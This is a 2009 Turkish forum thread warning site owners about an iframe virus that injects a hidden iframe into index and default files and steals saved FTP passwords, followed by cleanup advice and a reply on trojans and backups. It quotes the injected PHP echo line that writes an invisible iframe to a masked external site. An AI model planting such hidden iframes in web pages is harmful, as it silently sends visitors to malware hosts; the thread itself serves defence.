Duyuruyu Kapat

Sitelerinize bulaşan iframe virüsü

 • 10 Ağustos 2009
 • 2178 Okunma
 • 1 Cevap

0/5, 0 Oy
Konu Durumu:
Daha fazla cevap için açık değil.
 1. Sitelerinize bulaşan iframe virüsüne dikkat!

  echo "<iframe src=\\\\"http://*****.net/?click=6068265\\\\" width=1 height=1 style=\\\\"visibility:hidden;position:absolute\\\\ "></iframe>";


  Sitedeki index.html, index.php gibi dosyalarına bu virüsün kendini eklediği ve silinmesi konusunda zorluklar çıktığı yazılmış. Benimde bir ara başıma gelmişti.Çeşitli versiyonları olsa da temeli aynıdır. Aşağıdaki önerileri uygulayıp yüksek olasılıkla kurtulabilirsiniz.
  Dikkat : Google sitede virüsü görürse sizi hemen sıralamalarda aşağılara atabilir. Birde aramalardaki başlığın altında "Dikkat bu site zararlıdır" yazabilir.
  Bunun Google kaynaklı kullanıcı sayısına büyük darbe indireceği aşikardır.

  Bu virüs nedir, ne yapar?
  !!! - index.html, index.php gibi index adlı dosyalarına bu virüsün yukarıdaki gibi iframe kodu ekler. Bu kod virüsün yayılmasını sağlar. İndex dosyalarını görüntüleyen herkese virüs bulaşır.

  ******Gelen bir uyarıyı ekleyeyim istedim makaleye.
  Virüsün yeni versiyonu default.html, default.php ve diğer default adlı dosyalara da bulaşıyormuş eğer varsa bunları da temizleyiniz.

  !!! - Ftp programlarındaki kayıtlı şifreleri alarak siz virüsü bilgisayardan ve FTP&#8217;nizden sildiğinizde kendini yeniden ekler. (Özellikle CuteFTP varsa)
  !!! - Bir çok antivirüs programını atlatmaktadır. Uyarı veriyorlar ama hayır diyene kadar çoktan yazılmış oluyor bilgisayarda gerekli yerlere.
  !!! - Bir versiyonunun bilgisayardaki olan index.php vs dosyalarına da bulaşabildiği söyleniyor.

  Virüs bulaştı, nasıl kurtulunabilir?
  1 - Virüsü kaptığınızı anladığınızda internet bağlantınızı virüsü silinceye kadar kapatın. FTP programlarında kayıtlı şifreniz varsa saniyeler içerisinde yayılmaya başlıyor. Eğer kayıtlı şifre yoksa FTP&#8217;ye bulaşmıyor, sadece bilgisayarı etkiliyor.


  2 - Antivirüs ve spyware taraması yaptırın. Örn; Son güncelliğiyle bir Kaspersky ve Spy Sweeper tavsiyem. Yoksa ücretsiz AVG ile Ad-aware&#8217;yi deneyin. Taramada çıkanları temizleyin ama bitmedi.
  Muhtemel virüs çıkabilecek yerlere bakın. Aşağıdaki klasörlere gelip değiştirme tarihine göre dosyaları sıralarsanız kalmışsa virüs exelerini görebilirsiniz.Sabit bir ismi yok her geldiğinde rastgele bir isim alıyor exeler. Çok emin değilseniz silmeyin. Silinmezse bilgisayarı güvenli modda açıp silin.

   


  Yazan: ™мaxiмємσ!
 2. Nasıl Kurtulunabilire ek olarak arkadaşlar antivirüs yazılımları silemiyor. silebilen bir sürümü çıktıysa af ola ama sunu söylüyüm illa bu virüsten kurtulmak istoyorsanız söyle diyim. Bunun bir truva atı olduğunu çeşitli sayfalara soluanın bırakıldığını anlatayım. truva atından kurtulduysanız eğer solucanlar çoğalamaz ondan sonra sayfalarınızdan temizleebilirsiniz. elle veya gelişmiş mein editörü kullanarak. ama diyim truva atı dediğimiz malware kısmı pcnizde ve ftpnizde bulunuyorsa temizlenmediği taktirde eri bulaşır. buna en güzel tedbir. site yedeklemesidir. yapptıysanız soru yok ama acemiyseniz ve yedekleme yapmadıysanız böle uğrasırsınız tabi
   
Konu Durumu:
Daha fazla cevap için açık değil.
Yüklüyor...
23/10/2017 - 14:34